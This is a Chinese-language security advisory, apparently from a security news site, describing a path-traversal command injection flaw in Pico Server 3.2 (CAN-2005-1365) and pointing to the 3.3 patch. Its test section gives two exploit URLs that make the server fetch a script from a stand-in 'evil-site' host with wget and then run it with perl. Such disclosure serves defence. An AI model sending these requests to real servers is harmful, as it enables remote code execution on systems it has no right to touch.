Pico Server远程命令注入漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页

Pico Server远程命令注入漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-25 9:14:45

受影响系统：

Pserv Pserv 3.2

不受影响系统：

Pserv Pserv 3.3

描述：

CVE(CAN) ID: CAN-2005-1365

Pico Server是一款小型的Web服务器。

Pico Server对用户请求的路径字串处理上存在漏洞，远程攻击者可能利用此漏洞在主机上执行任意命令。

pServ支持CGI-BIN，只有以cgi-bin开始的ULR才会处理为cgi脚本。为了防范用户使用传统的/../遍历出cgi-bin，pServ在解析请求的URL时如果解析一个“/”计数器就会加1，如果解析到一个“/../”计数器就会减1。最后如果计数器不是0的话，就将URL认定为非法，拒绝该URL。但攻击者可以在URL中使用足够多的“/”（之间没有目录名）来防止被拒绝，这样就可以通过添加一些“/../”遍历出cgi-bin。这可能允许攻击者在服务器上以pServ权限执行任意命令。

<*来源：Claus R. F. Overbeck （bugtraq@clausrfoverbeck.de）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111627492005135&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

以下url会向服务器下载脚本或可执行程序：
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

之后脚本如下执行：
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

建议：

厂商补丁：

Pserv
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载3.3版本：

http://pserv.sourceforge.net/【转自世纪安全网 http://www.21safe.com】

新闻录入：admin 责任编辑：admin

上一篇新闻： Novell ZENworks管理工具存在多个远程溢出的漏洞

下一篇新闻： Sun Solaris C库未明权限提升漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

微软12日将发布9月更新
3Com TFTP超长传输模式字
KOffice畸形PPT文件处理
Apple Mac OS X 2006-00
CoolPlayer多个缓冲区溢
CA BrightStor ARCserve
Microsoft Visual Studi
Microsoft Windows Medi
Microsoft IE多个代码执
Microsoft SNMP远程任意

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览